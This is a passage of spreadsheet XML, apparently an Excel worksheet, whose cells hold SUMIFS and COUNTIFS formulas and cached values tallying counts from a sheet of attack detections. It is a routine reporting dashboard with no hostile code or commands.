        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>0</v>
      </c>
      <c r="CI52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>1</v>
      </c>
      <c r="CP52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>0</v>
      </c>
      <c r="CQ52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>0</v>
      </c>
      <c r="CR52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>0</v>
      </c>
      <c r="CU52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>0</v>
      </c>
      <c r="CY52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>0</v>
      </c>
      <c r="DE52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI52" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ52" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BG3:$BG139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>0</v>
      </c>
      <c r="DK52" s="271"/>
      <c r="DO52" s="279"/>
      <c r="DP52" s="271"/>
      <c r="DQ52" s="271"/>
      <c r="DR52" s="271"/>
      <c r="DS52" s="271"/>
      <c r="DT52" s="271"/>
      <c r="DU52" s="271"/>
      <c r="DV52" s="271"/>
      <c r="DW52" s="271"/>
      <c r="DX52" s="271"/>
      <c r="DY52" s="271"/>
      <c r="DZ52" s="271"/>
      <c r="EA52" s="271"/>
      <c r="EB52" s="271"/>
      <c r="EC52" s="271"/>
      <c r="ED52" s="280"/>
      <c r="EG52" s="279"/>
      <c r="EH52" s="271"/>
      <c r="EI52" s="358" t="s">
        <v>633</v>
      </c>
      <c r="EJ52" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S30 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK52" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S30 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="EL52" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S30 &amp; "*")</f>
        <v>10</v>
      </c>
      <c r="EM52" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI31,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S30 &amp; "*")</f>
        <v>12</v>
      </c>
      <c r="EN52" s="360">
        <f t="shared" si="37"/>
        <v>12</v>
      </c>
      <c r="EO52" s="364"/>
      <c r="EP52" s="456">
        <f t="shared" si="40"/>
        <v>0.2857142857</v>
      </c>
      <c r="EQ52" s="457">
        <f t="shared" si="41"/>
        <v>0.7142857143</v>
      </c>
      <c r="ER52" s="427">
        <f t="shared" si="42"/>
        <v>0.5238095238</v>
      </c>
      <c r="ES52" s="427">
        <f t="shared" si="43"/>
        <v>0.4615384615</v>
      </c>
      <c r="ET52" s="427">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="EU52" s="271"/>
      <c r="EV52" s="358" t="s">
        <v>951</v>
      </c>
      <c r="EW52" s="465">
        <f t="shared" ref="EW52:EZ52" si="45">IF(EJ30=0,"-",EJ51/EJ30)</f>
        <v>0.125</v>
      </c>
      <c r="EX52" s="465">
        <f t="shared" si="45"/>
        <v>0.5483870968</v>
      </c>
      <c r="EY52" s="465">
        <f t="shared" si="45"/>
        <v>0.5208333333</v>
      </c>
      <c r="EZ52" s="466">
        <f t="shared" si="45"/>
        <v>0.3617021277</v>
      </c>
      <c r="FA52" s="280"/>
      <c r="FK52" s="445"/>
      <c r="FL52" s="359"/>
      <c r="FM52" s="359"/>
      <c r="FN52" s="359"/>
      <c r="FO52" s="359"/>
      <c r="FP52" s="359"/>
      <c r="FY52" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="FZ52" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA52" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GC52" s="379" t="s">
        <v>1725</v>
      </c>
      <c r="GD52" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GE52" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY52)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY52 &amp; "*"))</f>
        <v>0</v>
      </c>
    </row>
    <row r="53">
      <c r="B53" s="277"/>
      <c r="C53" s="271"/>
      <c r="D53" s="271"/>
      <c r="E53" s="271"/>
      <c r="F53" s="271"/>
      <c r="G53" s="278"/>
      <c r="J53" s="277"/>
      <c r="K53" s="434"/>
      <c r="L53" s="353"/>
      <c r="M53" s="353"/>
      <c r="N53" s="354"/>
      <c r="O53" s="278"/>
      <c r="Q53" s="271"/>
      <c r="R53" s="352" t="s">
        <v>2512</v>
      </c>
      <c r="S53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>24</v>
      </c>
      <c r="T53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>106</v>
      </c>
      <c r="V53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="W53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Y53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Z53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>569</v>
      </c>
      <c r="AA53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AB53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="AC53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>3</v>
      </c>
      <c r="AD53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AE53" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="AF53" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AG53" s="271"/>
      <c r="AH53" s="352" t="s">
        <v>2512</v>
      </c>
      <c r="AI53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>23</v>
      </c>
      <c r="AJ53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>0</v>
      </c>
      <c r="AL53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>103</v>
      </c>
      <c r="AR53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>0</v>
      </c>
      <c r="AW53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>0</v>
      </c>
      <c r="BD53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG53" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CU3:$CU139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH53" s="355">
